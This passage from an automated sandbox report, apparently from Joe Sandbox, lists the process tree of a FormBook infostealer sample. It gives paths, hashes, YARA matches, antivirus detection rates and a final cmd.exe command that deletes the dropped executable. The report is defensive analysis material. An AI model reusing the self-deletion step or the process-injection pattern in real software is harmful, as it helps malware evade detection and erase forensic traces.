                                                      Programmed in: C, C++ or other language
                                                      Antivirus matches:
                                                      • Detection: 5%, Metadefender, Browse
                                                      • Detection: 2%, ReversingLabs
                                                      Reputation: moderate

                                                      General

                                                      Start time: 19:48:55
                                                      Start date: 03/08/2021
                                                      Path: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe
                                                      Wow64 process (32bit): true
                                                      Commandline: 'C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe'
                                                      Imagebase: 0x1080000
                                                      File size: 186368 bytes
                                                      MD5 hash: 48ECE2CA39A9EAE7FCED7418CF071D46
                                                      Has elevated privileges: true
                                                      Has administrator privileges: true
                                                      Programmed in: C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.821727953.0000000001081000.00000020.00020000.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.821727953.0000000001081000.00000020.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.821727953.0000000001081000.00000020.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.821846658.00000000012B0000.00000040.00000001.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.821846658.00000000012B0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.821846658.00000000012B0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000002.821488799.0000000000E10000.00000040.00000001.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000002.821488799.0000000000E10000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000002.821488799.0000000000E10000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000000.740219963.0000000001081000.00000020.00020000.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000000.740219963.0000000001081000.00000020.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000000.740219963.0000000001081000.00000020.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe, Author: JPCERT/CC Incident Response Group
                                                      Antivirus matches:
                                                      • Detection: 100%, Avira
                                                      • Detection: 100%, Joe Sandbox ML
                                                      • Detection: 49%, Metadefender, Browse
                                                      • Detection: 86%, ReversingLabs
                                                      Reputation: low

                                                      General

                                                      Start time: 19:48:57
                                                      Start date: 03/08/2021
                                                      Path: C:\Windows\explorer.exe
                                                      Wow64 process (32bit): false
                                                      Commandline: C:\Windows\Explorer.EXE
                                                      Imagebase: 0x7ff6fee60000
                                                      File size: 3933184 bytes
                                                      MD5 hash: AD5296B280E8F522A8A897C96BAB0E1D
                                                      Has elevated privileges: true
                                                      Has administrator privileges: true
                                                      Programmed in: C, C++ or other language
                                                      Reputation: high

                                                      General

                                                      Start time: 19:49:31
                                                      Start date: 03/08/2021
                                                      Path: C:\Windows\SysWOW64\cscript.exe
                                                      Wow64 process (32bit): true
                                                      Commandline: C:\Windows\SysWOW64\cscript.exe
                                                      Imagebase: 0xe0000
                                                      File size: 143360 bytes
                                                      MD5 hash: 00D3041E47F99E48DD5FFFEDF60F6304
                                                      Has elevated privileges: true
                                                      Has administrator privileges: true
                                                      Programmed in: C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000013.00000002.926228324.0000000004F0F000.00000004.00000001.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000013.00000002.926228324.0000000004F0F000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000013.00000002.926228324.0000000004F0F000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000013.00000002.925005416.0000000000278000.00000004.00000020.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000013.00000002.925005416.0000000000278000.00000004.00000020.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000013.00000002.925005416.0000000000278000.00000004.00000020.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000013.00000002.925127682.0000000000490000.00000004.00000001.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000013.00000002.925127682.0000000000490000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000013.00000002.925127682.0000000000490000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000013.00000002.926114786.0000000004BA0000.00000040.00000001.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000013.00000002.926114786.0000000004BA0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000013.00000002.926114786.0000000004BA0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                      • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000013.00000002.925530735.00000000031B0000.00000040.00000001.sdmp, Author: Joe Security
                                                      • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000013.00000002.925530735.00000000031B0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                      • Rule: Formbook, Description: detect Formbook in memory, Source: 00000013.00000002.925530735.00000000031B0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                      Reputation:moderate

General

Start time: 19:49:34
Start date: 03/08/2021
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: /c del 'C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe'
Imagebase: 0x11d0000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 19:49:35
Start date: 03/08/2021
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff724c50000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

Disassembly

Code Analysis
